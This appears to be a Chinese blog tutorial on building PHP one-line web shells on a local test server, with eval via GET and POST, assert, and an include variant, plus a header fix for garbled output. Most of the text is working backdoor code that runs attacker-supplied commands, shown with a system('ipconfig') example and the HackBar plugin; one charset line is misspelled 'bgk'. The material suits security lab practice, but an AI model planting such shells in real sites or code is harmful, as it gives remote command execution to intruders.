过程中出现乱码可以用这条命令来解决:
header('Content-Type: text/html;charset=gbk');
1.GET
第一步:在www目录下新建一个get.php文件
第二步:进行编辑
<?php @eval($_GET['cmd']);?>
第三步:在网页中打开,里面的 "ipconfig" 也可以换成 "whoami"(%27就是单引号[ ' ])
http://127.0.0.1/get.php?cmd=system(%27ipconfig%27);
第四步:可以看到我们出现了乱码,那么就在原来的get.php文件加入一条命令。
header('Content-Type:text/html;charset=gbk');
第五步:然后回到网页,刷新一下就可以看到乱码好了
2.post
第一步:需要先在浏览器安装一个HackBar插件
第二步:跟get.php一样,在www目录下新建post.php文件
第三步:进行编辑,这里直接吧解决乱码的代码直接输进去
<?php
header('Content-Type:text/html;charset=bgk');
@eval($_POST['cmd']);
?>
第四步:来到网页访问,在地址栏输入127.0.0.1/post.php,回车然后按F12,找到刚才安装的那个插件
3.assert
第一步:在www目录下新建一个assert.php文件,这个post那个一样都需要用到HackBar
第二步:进行编辑,都直接把解决乱码这个输进去,避免出现乱码
<?php
header('Content-Type:text/html;charset=gbk');
@assert($_POST['cmd']);
?>
第三步:打开网页,在地址栏输入127.0.0.1/assert.php,回车然后按F12,找到刚才安装的那个插件
4.文件包含(get、post、assert)
第一步:在www目录下新建一个include.php用于与get、post、assert连接
第二步:进行编辑
<?php phpinfo();?>
第三步:在原有get.php里面添加include.php这个文件,进行连接(这里以GET这个为例)
<?php
include "include.php";
header('Content-Type:text/html;charset=gbk');
@eval($_GET['cmd']);
?>
第四步:去网页刷新get这个网页
这里我是以GET为例其他两个跟这个一样,只需要在php文件里加入include就可以了,然后刷新就可以了
扫一扫
1269
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
